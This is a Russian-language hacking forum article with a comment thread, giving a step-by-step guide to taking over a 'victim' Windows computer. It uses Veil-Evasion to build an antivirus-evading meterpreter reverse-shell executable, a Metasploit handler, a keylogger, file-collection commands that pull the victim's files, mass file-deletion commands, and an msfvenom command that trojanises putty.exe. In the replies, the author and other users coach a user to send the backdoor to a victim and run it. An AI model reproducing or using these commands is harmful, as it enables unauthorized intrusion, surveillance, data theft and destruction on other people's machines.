Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:
W

woweb

Не работает схема...фуфло а не статья
 
W

woweb

Не работает схема...фуфло а не статья
Что именно делали? Скриншоты можно? Просто буквы нажимать на клавиатуре нажимать несложно...
Могу сфотать весь процесс...один хер кроме хп по этой схеме не сломаешь...а после 7 и выше никуя не прокатит...и весь материал на этом сайте с каменного века...не путайте людей своим бредом...
 
W

woweb

Ты требуешь скрины...а ты сам выложи весь процесс в видео на реальной машине, вот тогда и я заморочусь со скринами...а так чтоб удовлетворить самолюбие что то не очень хочется
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Ты требуешь скрины...а ты сам выложи весь процесс в видео на реальной машине, вот тогда и я заморочусь со скринами...а так чтоб удовлетворить самолюбие что то не очень хочется
Какой мне смысл, доказывать тебе что-то, снимать видео... Если есть актуальный материал, поделись своим, покажи как нужно. Эксперт:)
 
  • Нравится
Реакции: SS35 и id2746

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Ну и повторюсь, это не статья о том, как сломать все и вся, а инструкция к размышлению наверное больше. На этом ресурсе вы такого не найдете, так, что можете не тратить время. Гуглите лучше: "Как стать хакером, чтобы мамка не заругала?", "Взломать контакт, одноклассники, NASA, без регистрации и СМС..."
 
W

woweb

Какой мне смысл, доказывать тебе что-то, снимать видео... Если есть актуальный материал, поделись своим, покажи как нужно. Эксперт:)
Был бы эксперт не задавл вопросы и не сидел тут в качестве а что да как...сам писал мануал...а так вот хочу освоить данную тему...если поможешь буду рад...а скрины завтра выложу, сегодня уже не успею рабочий день заканчивается...буду пытаться проникнуть в реальную машину в своей локалке...в общем завтра покажет...то что я делаю что-то не так понятно поэтому здесь и стучусь к вам...спасибо за ответ!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Был бы эксперт не задавл вопросы и не сидел тут в качестве а что да как...сам писал мануал...а так вот хочу освоить данную тему...если поможешь буду рад...а скрины завтра выложу, сегодня уже не успею рабочий день заканчивается...буду пытаться проникнуть в реальную машину в своей локалке...в общем завтра покажет...то что я делаю что-то не так понятно поэтому здесь и стучусь к вам...спасибо за ответ!
Без проблем, я то помогу. Задавайте вопросы, буду рад ответить.
 
W

woweb

Без проблем, я то помогу. Задавайте вопросы, буду рад ответить.
Привет рад что отвечаешь...
В общем прошел все шаги (кроме самой установки проги) и зависает на последнем этапе, ничего не происходит...
Скрины выкладываю...
Может что делаю не так!?
Выделение_005.png


Выделение_005.png
 

Вложения

  • Выделение_001.png
    Выделение_001.png
    83,1 КБ · Просмотры: 506
  • Выделение_005.png
    Выделение_005.png
    79,5 КБ · Просмотры: 388

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
"зависает на последнем этапе, ничего не происходит..." - Вижу открытую сессию meterpreter, он не реагирует на команды? Попробуй ввести ps или getsystem
 
M

MAdDog719

"Зависает" может имеет виду то что хендлер просто ждет пока получит пакеты от плейлоада. А плейлоад не создан и не запущен на машине жертвы.

Хотя, да, видно что есть запущена сессия метерпретер.
 
  • Нравится
Реакции: -=S_U_N_Y=-
W

woweb

"зависает на последнем этапе, ничего не происходит..." - Вижу открытую сессию meterpreter, он не реагирует на команды? Попробуй ввести ps или getsystem
Да это твой meterpreter из урока (на скрине он ведь тоже сфотался) почитал на других форумах...дах ХП данным метдом не ломается если там sp3 стоит...у меня всех компах sp1 правда их всего три осталось...остальные на 7,8 и 10...
А у тебя нет другого манулала по влому компа...а то что-то этот метон ну никак не хочет идти!
 
W

woweb

"Зависает" может имеет виду то что хендлер просто ждет пока получит пакеты от плейлоада. А плейлоад не создан и не запущен на машине жертвы.

Хотя, да, видно что есть запущена сессия метерпретер.
Запущена только не у меня...а с урока который отпечатался на скрине!
 
M

MAdDog719

Да это твой meterpreter из урока (на скрине он ведь тоже сфотался) почитал на других форумах...дах ХП данным метдом не ломается если там sp3 стоит...у меня всех компах sp1 правда их всего три осталось...остальные на 7,8 и 10...
А у тебя нет другого манулала по влому компа...а то что-то этот метон ну никак не хочет идти!

все он идет на 7 и 8 винде, просто ты не разобрался. ты запустил прогу которая просто слушает порт и ждет пока плейлоад начнет отправлять пакеты на порт (в твоем случае это порт 443). а сам плейлоад ты не создал. Нужно создать бекдор и запустить его на машине жертвы.
 
W

woweb

все он идет на 7 и 8 винде, просто ты не разобрался. ты запустил прогу которая просто слушает порт и ждет пока плейлоад начнет отправлять пакеты на порт (в твоем случае это порт 443). а сам плейлоад ты не создал. Нужно создать бекдор и запустить его на машине жертвы.
А как это сделать можешь мануал написать...плиз...очень надо!
 
M

MAdDog719

А как это сделать можешь мануал написать...плиз...очень надо!
Эта тема и есть мануал, сделай все как в первом посте и обрати внимания на скрин.
upload_2016-7-26_15-35-57-png.6768


Зеленым выделен путь к файлу который нужно запустить на компьютере жертвы. То есть отправь файлик fhackyou1.exe жертве и запустить его
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
А как это сделать можешь мануал написать...плиз...очень надо!
Запустил Veil Evasion, выбрал 34 (к примеру номер пайлоада) и сгенерировал файлик
upload_2016-11-3_11-24-40.png

Затем запустил Metasploit, и задал необходимые параметры и потом запустил файлик на компьютере к которому нужно получить доступ:
upload_2016-11-3_11-29-27.png

Все работает:
upload_2016-11-3_11-30-24.png

Ну и доказательство, что это не XP )))
upload_2016-11-3_11-31-15.png


upload_2016-11-3_11-34-14.png
 
Последнее редактирование:
  • Нравится
Реакции: id2746 и -=S_U_N_Y=-

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
"Зависает" может имеет виду то что хендлер просто ждет пока получит пакеты от плейлоада. А плейлоад не создан и не запущен на машине жертвы.

Хотя, да, видно что есть запущена сессия метерпретер.
Значит все работает, сессия установлена
 
W

woweb

Круто...щас пообедаю и попробую...а может одновременно...
Спасибо заранее!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!